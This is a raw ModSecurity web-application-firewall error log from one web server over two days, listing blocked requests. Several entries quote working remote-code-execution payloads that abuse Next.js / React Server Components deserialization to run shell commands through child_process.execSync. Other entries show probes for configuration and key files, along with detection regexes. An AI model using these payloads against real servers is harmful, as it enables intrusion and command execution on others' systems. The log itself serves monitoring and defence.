"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_ab08232a | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "aXG_NYHhqxnaPBTFRbwYpAAAAZQ"] [Thu Jan 22 08:09:57.344702 2026] [:error] [pid 15779:tid 15828] [client 18.188.174.228:39272] [client 18.188.174.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_ab08232a | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "aXG_NYHhqxnaPBTFRbwYpQAAAYo"] [Thu Jan 22 08:09:57.450758 2026] [:error] [pid 15779:tid 15803] [client 18.188.174.228:39272] [client 18.188.174.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo RCE_ae266f | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_f..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "aXG_NYHhqxnaPBTFRbwYpgAAAYI"] [Thu Jan 22 08:09:57.556787 2026] [:error] [pid 15779:tid 15822] [client 18.188.174.228:39272] [client 18.188.174.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo RCE_ae266f | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_f..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "aXG_NYHhqxnaPBTFRbwYpwAAAYg"] [Thu Jan 22 08:09:57.663185 2026] [:error] [pid 15779:tid 15855] [client 18.188.174.228:39272] [client 18.188.174.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo Xe7384593fbX | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "aXG_NYHhqxnaPBTFRbwYqAAAAZM"] [Thu Jan 22 08:09:57.769264 2026] [:error] [pid 15779:tid 15842] [client 18.188.174.228:39272] [client 18.188.174.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo Xe7384593fbX | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "aXG_NYHhqxnaPBTFRbwYqQAAAY8"] [Thu Jan 22 08:09:57.875378 2026] [:error] [pid 15779:tid 15819] [client 18.188.174.228:39272] [client 18.188.174.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('id | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "aXG_NYHhqxnaPBTFRbwYqgAAAYc"] [Thu Jan 22 15:10:50.355646 2026] [:error] [pid 23833:tid 23960] [client 45.148.10.95:43896] [client 45.148.10.95] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/dev-unit.com"] [unique_id "aXIh2so_-i6oc32FN_jG7AAAAJU"] [Thu Jan 22 15:10:51.099509 2026] [:error] [pid 23831:tid 23912] [client 45.148.10.95:43988] [client 45.148.10.95] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/dev-unit.com"] [unique_id "aXIh29peb0TUdksM02D_4QAAAEA"] [Thu Jan 22 15:10:51.880590 2026] [:error] [pid 23833:tid 23957] [client 45.148.10.95:43926] [client 45.148.10.95] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/services/dev-unit.com"] [unique_id "aXIh28o_-i6oc32FN_jG8gAAAJI"] [Thu Jan 22 15:10:52.946183 2026] [:error] [pid 23833:tid 23947] [client 45.148.10.95:44008] [client 45.148.10.95] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/solutions/dev-unit.com"] [unique_id "aXIh3Mo_-i6oc32FN_jG9QAAAIw"] [Thu Jan 22 16:37:51.944029 2026] [:error] [pid 15779:tid 15850] [client 85.11.167.4:57822] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1769092701_1920',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1769092701_192..."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "aXI2P4HhqxnaPBTFRbzfSQAAAZI"], referer: https://web.dev-unit.com [Thu Jan 22 16:37:52.021808 2026] [:error] [pid 23833:tid 23930] [client 85.11.167.4:57830] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1769092701',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1769092701',{'timeo..."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "aXI2QMo_-i6oc32FN_juvwAAAIM"], referer: https://web.dev-unit.com [Thu Jan 22 18:50:06.397534 2026] [:error] [pid 1410:tid 1429] [client 3.97.114.35:59004] [client 3.97.114.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "aXJVPoDcjBV5xEDNqy0IKgAAA0E"] [Thu Jan 22 19:07:18.746522 2026] [:error] [pid 15707:tid 15854] [client 20.233.13.34:2325] [client 20.233.13.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "aXJZRlgIUiO0ct1AZhpZKAAAARM"] [Thu Jan 22 19:07:19.392555 2026] [:error] [pid 23833:tid 23934] [client 20.233.13.34:2327] [client 20.233.13.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "aXJZR8o_-i6oc32FN_gnEgAAAIU"] [Fri Jan 23 08:16:12.665711 2026] [:error] [pid 5564:tid 5586] [client 3.6.163.156:41364] [client 3.6.163.156] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "aXMSLHpxNQZhJlB6AF2JNQAAAUg"] [Fri Jan 23 08:16:13.192428 2026] [:error] [pid 5564:tid 5617] [client 3.6.163.156:41366] [client 3.6.163.156] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "aXMSLXpxNQZhJlB6AF2JNwAAAVc"] [Fri Jan 23 22:49:53.190564 2026] [:error] [pid 15629:tid 15648] [client 185.177.72.13:29190] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/opt/mailcow-dockerized/mailcow.conf"] [unique_id "aXPe8c-vEegKBBgna6EPQAAAANE"] [Fri Jan 23 22:50:02.026054 2026] [:error] [pid 15537:tid 15542] [client 185.177.72.13:29940] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/s3.key"] [unique_id "aXPe-v0tTn3JODp9pXod7QAAAAE"] [Fri Jan 23 22:50:03.903425 2026] [:error] [pid 15537:tid 15557] [client 185.177.72.13:29940] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ 